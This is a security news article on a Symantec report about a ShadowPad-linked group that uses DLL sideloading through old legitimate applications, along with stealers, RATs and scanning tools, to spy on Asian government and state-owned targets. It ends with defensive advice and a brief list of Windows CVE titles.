Researchers from Broadcom's Software's Symantec Threat Hunter team observed the ShadowPad\-related threat group using the tactic in a cyber-espionage campaign. The group's targets have so far included a prime minister's office, government organizations linked to the finance sector, government-owned defense and aerospace firms, and state-owned telecom, IT, and media companies. The security vendor's analysis showed the campaign has been ongoing since at least early 2021, with intelligence being the primary focus.

**A Well-Known Cyberattack Tactic, but Successful**

"The use of legitimate applications to facilitate DLL sideloading appears to be a growing trend among espionage actors operating in the region," Symantec said in a report this week. It's an attractive tactic because anti-malware tools often don't spot the malicious activity because attackers used old applications for side loading.

"Aside from the age of the applications, the other commonality is that they were all relatively well-known names and thus may appear innocuous." says Alan Neville, threat intelligence analyst with Symantec's threat hunter team.  

The fact that the group behind the current campaign in Asia is using the tactic despite it being well-understood suggests the technique is yielding some success, Symantec said.

Neville says his company has not recently observed threat actors use the tactic in the US or elsewhere. "The technique is mostly used by attackers focusing on Asian organizations," he adds.

Neville says that in most of the attacks in the latest campaign, threat actors used the legitimate PsExec Windows utility for executing programs on remote systems to carry out the sideloading and deploy malware. In each case, the attackers had already previously compromised the systems on which it installed the old, legitimate apps.

"\[The programs\] were installed on each compromised computer the attackers wanted to run malware on. In some cases, it could be multiple computers on the same victim network," Neville says. In other instances, Symantec also observed them deploying multiple legitimate application on a single machine to load their malware, he adds.

"They used quite an array of software, including security software, graphics software, and Web browsers," he notes. In some cases, Symantec researchers also observed the attacker using legitimate system files from the legacy Windows XP OS to enable the attack.  

**Logdatter, Range of Malicious Payloads**

One of the malicious payloads is a new information stealer dubbed Logdatter, which allows the attackers to log keystrokes, take screenshots, query SQL databases, inject arbitrary code, and download files, among other things. Other payloads that the threat actor is using in its Asian campaign include a PlugX-based Trojan, two RATs dubbed Trochilus and Quasar, and several legitimate dual-use tools. These include Ladon, a penetration testing framework, FScan, and NBTscan for scanning victim environments.

Neville says Symantec has been unable to determine with certainty how the threat actors might be gaining initial access on a target environment. But phishing and opportunity targeting of unpatched systems are likely vectors.

"Alternatively, a software supply chain attack is not outside the remit of these attackers as actors with access to ShadowPad are known to have launched supply chain attacks in the past," Neville notes. Once the threat actors have gained access to an environment, they have tended to use a range of scanning tools such as NBTScan, TCPing, FastReverseProxy, and Fscan to look for other systems to target.

To defend against these kinds of attacks, organizations need to implement mechanisms for auditing and controlling what software might be running on their network. They should also consider implementing a policy of only allowing whitelisted applications to run in the environment and prioritize patching of vulnerabilities in public-facing applications. 

"We'd also recommend taking immediate action to clean machines that exhibit any indicators of compromise," Neville advises, "... including cycling credentials and following your own organization's internal process to perform a thorough investigation."

ShadowPad Threat Actors Return With Fresh Government Strikes, Updated Tools

Windows Common Log File System Driver Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-35803.

CVE-2022-37969

Windows Group Policy Elevation of Privilege Vulnerability.

CVE-2022-37955

Windows Kernel Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-37956, CVE-2022-37957.

Tag

#windows